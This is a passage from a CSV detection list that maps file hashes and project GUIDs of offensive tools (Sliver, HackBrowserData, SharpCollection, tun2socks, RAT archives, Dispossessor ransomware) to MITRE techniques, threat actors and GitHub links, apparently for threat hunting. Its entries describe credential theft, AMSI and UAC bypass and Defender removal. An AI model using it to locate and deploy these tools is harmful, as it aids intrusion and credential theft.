"*4d8017e676ae345fc21e9037d70cf7c8444c945a61a533dc1926453caf7457d9*",".{0,1000}4d8017e676ae345fc21e9037d70cf7c8444c945a61a533dc1926453caf7457d9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26306" "*4d8abac919ee89fdf0e387f98f076db1bae2ec1a9113a87baa2a2afe9cbaf842*",".{0,1000}4d8abac919ee89fdf0e387f98f076db1bae2ec1a9113a87baa2a2afe9cbaf842.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26308" "*4d906dada24cb2d009d6cde9005711271167fc5bc9c348d9b436056a7ba80f26*",".{0,1000}4d906dada24cb2d009d6cde9005711271167fc5bc9c348d9b436056a7ba80f26.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","26309" "*4d967d51603e83aae994ae5354416bfb0867b27527da4fd94b40f75c2d3c641e*",".{0,1000}4d967d51603e83aae994ae5354416bfb0867b27527da4fd94b40f75c2d3c641e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26311" "*4d9b2297358dbe1d72168480ab67ef7b992c2b84d4f09d71d906c941523f7b74*",".{0,1000}4d9b2297358dbe1d72168480ab67ef7b992c2b84d4f09d71d906c941523f7b74.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","0","#filehash","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","26312" "*4da3a2389627e7ba88645c2b77a46a06ba84738dcd1fe2c0b319be1190b8b082*",".{0,1000}4da3a2389627e7ba88645c2b77a46a06ba84738dcd1fe2c0b319be1190b8b082.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26314" "*4da7304d47772ca23c20710b9b2fa51466080b8f2c6cc3168c908bc25cbecd10*",".{0,1000}4da7304d47772ca23c20710b9b2fa51466080b8f2c6cc3168c908bc25cbecd10.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26315" "*4db3484ba73cd09d06aeee140adcd85fb6c72fb76d05a86ae95fb27e9c795e45*",".{0,1000}4db3484ba73cd09d06aeee140adcd85fb6c72fb76d05a86ae95fb27e9c795e45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26317" "*4db9721f4c76b487e34fa87bb6a76632fb37873de18982892268a70b18b8a4a9*",".{0,1000}4db9721f4c76b487e34fa87bb6a76632fb37873de18982892268a70b18b8a4a9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26318" "*4dbd32931bc77778850c20282a9e3adebd4d23b7ef4b0635380b520c432b48d9*",".{0,1000}4dbd32931bc77778850c20282a9e3adebd4d23b7ef4b0635380b520c432b48d9.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","#filehash","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","26320" "*4dc4fec23df1e9a1fcd37f4edf731466f14eefa9eded63a3387ee14adf70e104*",".{0,1000}4dc4fec23df1e9a1fcd37f4edf731466f14eefa9eded63a3387ee14adf70e104.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","26321" "*4dd16113033905dbff69b134008cb848367c4d6899c6d5f9b63164328e576d79*",".{0,1000}4dd16113033905dbff69b134008cb848367c4d6899c6d5f9b63164328e576d79.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26323" "*4dd26db699ec39da43ed638597d277ccfe5e27d15dedfb037476d0f4a5b8cb87*",".{0,1000}4dd26db699ec39da43ed638597d277ccfe5e27d15dedfb037476d0f4a5b8cb87.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - 
TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","26324" "*4DD3206C-F14A-43A3-8EA8-88676810B8CD*",".{0,1000}4DD3206C\-F14A\-43A3\-8EA8\-88676810B8CD.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","#GUIDproject","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","26325" "*4ddb624f4a569274b1dbe946a2a7c6c4bd43d36183bdef148814c228147b2fd2*",".{0,1000}4ddb624f4a569274b1dbe946a2a7c6c4bd43d36183bdef148814c228147b2fd2.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26326" "*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*",".{0,1000}4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","26327" "*4de29767842d979fd17a50becf0295588a1578b793c5415032847d684f54e445*",".{0,1000}4de29767842d979fd17a50becf0295588a1578b793c5415032847d684f54e445.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26328" "*4DE43724-3851-4376-BB6C-EA15CF500C44*",".{0,1000}4DE43724\-3851\-4376\-BB6C\-EA15CF500C44.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","#GUIDproject","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","26329" "*4de62887a3d002ead967d9ba1a18f05d5859429477457b6da2ff54f2fa5ae624*",".{0,1000}4de62887a3d002ead967d9ba1a18f05d5859429477457b6da2ff54f2fa5ae624.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26331" "*4de639c973c8f91cf5e4e9c8078dacbbec2de8443b400c8233f1b5dae48a9444*",".{0,1000}4de639c973c8f91cf5e4e9c8078dacbbec2de8443b400c8233f1b5dae48a9444.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","26332" "*4de892d30281aac34dd5aeb710d6fffc90e46b7d9df8505205531afe991973f4*",".{0,1000}4de892d30281aac34dd5aeb710d6fffc90e46b7d9df8505205531afe991973f4.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#filehash","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","26334" "*4debfbce500084f6de01ea2cabbbde5fb6c04c99285dc82047fc53db5a868e5f*",".{0,1000}4debfbce500084f6de01ea2cabbbde5fb6c04c99285dc82047fc53db5a868e5f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26335" "*4dec200d795dfe7369061bc3bd38e8bb6ff332360295e2786f4a60003786503e*",".{0,1000}4dec200d795dfe7369061bc3bd38e8bb6ff332360295e2786f4a60003786503e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26336" 
"*4e025470453cc0b4c72b384b1441ecbeba1cf3b2ae98837ba630aa5102d1b6d0*",".{0,1000}4e025470453cc0b4c72b384b1441ecbeba1cf3b2ae98837ba630aa5102d1b6d0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26339" "*4e09f3d552d00f6ade653b2a9c289a411062b14fab2148f7accab8c8428c9bdb*",".{0,1000}4e09f3d552d00f6ade653b2a9c289a411062b14fab2148f7accab8c8428c9bdb.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#filehash","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","26341" "*4e0c5d445fc69d7fa6a1e8f72682d16055870a743850d9accd51f2c4cc048000*",".{0,1000}4e0c5d445fc69d7fa6a1e8f72682d16055870a743850d9accd51f2c4cc048000.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26342" "*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*",".{0,1000}4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD 
Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","26343" "*4e11543f50b3c5b039a4717efddbcf89d8c4b7e8f85f257ad4b0749c7d589d38*",".{0,1000}4e11543f50b3c5b039a4717efddbcf89d8c4b7e8f85f257ad4b0749c7d589d38.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26344" "*4e13c7ed59d350b0f0b92062e063afd574452e72a74dd3ee0b5938c514c85749*",".{0,1000}4e13c7ed59d350b0f0b92062e063afd574452e72a74dd3ee0b5938c514c85749.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26345" "*4e1531d35b504cd39a927b3f3dab61a7d8642b405e5f999ff52fa47381e0caa6*",".{0,1000}4e1531d35b504cd39a927b3f3dab61a7d8642b405e5f999ff52fa47381e0caa6.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26346" "*4e1531d35b504cd39a927b3f3dab61a7d8642b405e5f999ff52fa47381e0caa6*",".{0,1000}4e1531d35b504cd39a927b3f3dab61a7d8642b405e5f999ff52fa47381e0caa6.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","26347" "*4e190d43b933586e8abdcbd64e900d02345834bc0ca314b8b8abc86b3c176bd3*",".{0,1000}4e190d43b933586e8abdcbd64e900d02345834bc0ca314b8b8abc86b3c176bd3.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","26350" "*4e19296bcc9b552e7993c02d573a1a5102e0733873aced32809d68c4d0b8428d*",".{0,1000}4e19296bcc9b552e7993c02d573a1a5102e0733873aced32809d68c4d0b8428d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26351" 
"*4e2627bb524a79ae5f2f54a5a209b27a8901d2a92ff466621edb587b504c0428*",".{0,1000}4e2627bb524a79ae5f2f54a5a209b27a8901d2a92ff466621edb587b504c0428.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26354" "*4e28d3cd00dac5c63ce16fb55efc2024a7d202074013f1264749cf462f6dba03*",".{0,1000}4e28d3cd00dac5c63ce16fb55efc2024a7d202074013f1264749cf462f6dba03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26356" "*4e2e5319f881c4a83bfeeeaf713beb1ee5ee4b19dff511abe8f05f9e2e1c3c55*",".{0,1000}4e2e5319f881c4a83bfeeeaf713beb1ee5ee4b19dff511abe8f05f9e2e1c3c55.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#filehash","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","26359" 
"*4E3374D3AC2BA877D985A8D3FCEB7A9D5E518C16029A2DC5CE8DBA4306384A8D*",".{0,1000}4E3374D3AC2BA877D985A8D3FCEB7A9D5E518C16029A2DC5CE8DBA4306384A8D.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26360" "*4e352b020c8f888cb620a64282df6b60a862f905e831101d060a0fbdbbb25932*",".{0,1000}4e352b020c8f888cb620a64282df6b60a862f905e831101d060a0fbdbbb25932.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","26361" "*4e3beb361e85dab6b6f15e0c72e8e47376d0b678dd7ba537c24a5e0e5085ea7c*",".{0,1000}4e3beb361e85dab6b6f15e0c72e8e47376d0b678dd7ba537c24a5e0e5085ea7c.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for Windows","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/ASkyeye/win-server2022-UAC-Bypass","1","0","#filehash","N/A","9","1","0","1","2024-02-04T00:10:43Z","2021-09-25T03:36:02Z","26362" "*4E48vR7v8OUJO5OEYkOUUZmF55UOYVqo9l9w2eRS50k=*",".{0,1000}4E48vR7v8OUJO5OEYkOUUZmF55UOYVqo9l9w2eRS50k\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","26363" "*4e50d7d853d7b14ecbaa3ec881d83deac55fb19d4934a6f7ab0cb887b7dbf991*",".{0,1000}4e50d7d853d7b14ecbaa3ec881d83deac55fb19d4934a6f7ab0cb887b7dbf991.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26364" "*4e532494ca7946d90f71ace5f8c709fe09de8d20ebf8a0895dda55cf467557e8*",".{0,1000}4e532494ca7946d90f71ace5f8c709fe09de8d20ebf8a0895dda55cf467557e8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26365" "*4e661f7632fefee0728e6c32d0ee6e738f7e6eb5fdba08b8cf9f8a65cbc4f6cd*",".{0,1000}4e661f7632fefee0728e6c32d0ee6e738f7e6eb5fdba08b8cf9f8a65cbc4f6cd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26368" 
"*4e696f42a13a53a3b747b3575fa66b0ca4b71359a932c7b9ef8d4962bcb7f085*",".{0,1000}4e696f42a13a53a3b747b3575fa66b0ca4b71359a932c7b9ef8d4962bcb7f085.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26370" "*4e6ce0dc8e2b945807e72bc1006cc3ed126542ee95395ccbf973a47cc8b7f04a*",".{0,1000}4e6ce0dc8e2b945807e72bc1006cc3ed126542ee95395ccbf973a47cc8b7f04a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26371" "*4e6e01948bbd969f58b1535f30efc9b75c63e0d362b9487b9ea8ebe768ce893e*",".{0,1000}4e6e01948bbd969f58b1535f30efc9b75c63e0d362b9487b9ea8ebe768ce893e.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","26372" "*4e82ec92f2cd6fd2a1f62c874170a00ec419bae8ad713f2ec1d3a25ad1746693*",".{0,1000}4e82ec92f2cd6fd2a1f62c874170a00ec419bae8ad713f2ec1d3a25ad1746693.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","#filehash","N/A","10","","N/A","","","","26375" 
"*4e99cad33b9606164531fa25d8acd59348d83961a45179b7bf7bc54540f03eb8*",".{0,1000}4e99cad33b9606164531fa25d8acd59348d83961a45179b7bf7bc54540f03eb8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26377" "*4eb2e5cc10a089a025c8daf42bafebab7dd1096b9aaac4c643d10c80ee85858b*",".{0,1000}4eb2e5cc10a089a025c8daf42bafebab7dd1096b9aaac4c643d10c80ee85858b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26378" 